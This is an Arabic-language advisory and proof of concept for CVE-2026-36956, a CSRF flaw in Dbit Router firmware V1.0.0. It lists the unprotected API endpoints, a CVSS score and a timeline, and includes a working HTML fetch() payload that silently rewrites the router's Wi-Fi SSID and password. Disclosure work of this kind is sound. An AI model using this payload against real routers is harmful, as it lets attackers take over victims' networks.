
إثبات المفهوم لـ CVE-2026-36956، وهي ثغرة CSRF في البرنامج الثابت لموجّه Dbit تسمح بتغييرات غير مصرّح بها في الإعدادات عبر طلبات مزوّرة.
معرف CVE: CVE-2026-36956 التاريخ: 2026-04-29 المكتشف: Kirubel Solomne البائع: Shenzhen Dibit Network Equipment Co., Ltd. المنتج: Dbit Router إصدار البرنامج الثابت: V1.0.0 CWE: CWE-352 - تزوير الطلبات عبر المواقع (CSRF)
لا يطبّق البرنامج الثابت لجهاز التوجيه Dbit Router الإصدار V1.0.0 آليات حماية من CSRF مثل رموز مكافحة CSRF أو التحقق الصارم من رؤوس Origin/Referer على نقاط نهاية الإدارة عبر API. يمكن للمهاجم إنشاء صفحة ويب خبيثة ترسل طلبات HTTP مزورة إلى نقاط نهاية التكوين. إذا قام مسؤول مصادق بزيارة الصفحة الخبيثة، يعالج جهاز التوجيه الطلب المزور كإجراء إداري شرعي.
درجة CVSS v3.1: 8.8 (عالية)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
| المقياس | القيمة |
|---|
| ناقل الهجوم | الشبكة |
| تعقيد الهجوم | منخفض |
| الامتيازات المطلوبة | لا شيء |
| تفاعل المستخدم | مطلوب |
| تأثير السرية | عالٍ |
| تأثير السلامة | عالٍ |
| تأثير التوافر | عالٍ |
| نقطة النهاية | الوظيفة |
|---|---|
/api/setWlan | تكوين الشبكة اللاسلكية (SSID، كلمة المرور) |
/api/setWan | تكوين WAN |
/api/setSystem | تكوين النظام |
احفظ ما يلي باسم poc.html وافتحه بينما يكون مسؤول مسجلاً دخوله إلى جهاز التوجيه:
<!DOCTYPE html>
<html>
<body>
<script>
fetch('http://192.168.10.1/api/setWlan', {
method: 'POST',
credentials: 'include',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
ssid: "Hacked_Network",
password: "attacker123"
})
});
</script>
</body>
</html>
السلوك المتوقع: يجب رفض الطلب بسبب عدم تطابق رمز CSRF. السلوك الفعلي: يقبل جهاز التوجيه الطلب المزور ويعالجه.
| التاريخ | الحدث |
|---|---|
| 2026-04-29 | اكتشاف الثغرة |
| 2026-04-29 | الإبلاغ إلى MITRE |
| 2026-04-29 | تعيين CVE-2026-36956 |
| 2026-04-29 | الإفصاح العام |